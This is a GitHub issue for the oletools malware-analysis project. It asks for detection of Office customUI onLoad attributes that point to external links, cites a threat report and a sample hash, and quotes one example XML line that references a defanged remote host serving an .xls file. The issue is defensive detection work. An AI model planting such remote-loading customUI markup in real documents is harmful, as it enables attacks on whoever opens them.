oleobj: add detection for customUI external links

decalage2 / oletools

oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging.

http://www.decalage.info/python/oletools

Other

2.88k stars 564 forks source link

oleobj: add detection for customUI external links #730

Open decalage2 opened 2 years ago

decalage2 commented 2 years ago

See this article: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html Sample: https://bazaar.abuse.ch/sample/f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4/

Example:

<customUI xmlns="http://schemas.microsoft.com/office/2006/01/customui" onLoad='https://wordkeyvpload[.]net/keys/parliament_rew.xls!123'> </customUI>

also update oleid to report it.

christian-intra2net commented 2 years ago

If this sample is publicly available, could we add it to our unit test samples and check that the customUI-threat is also detected in the future?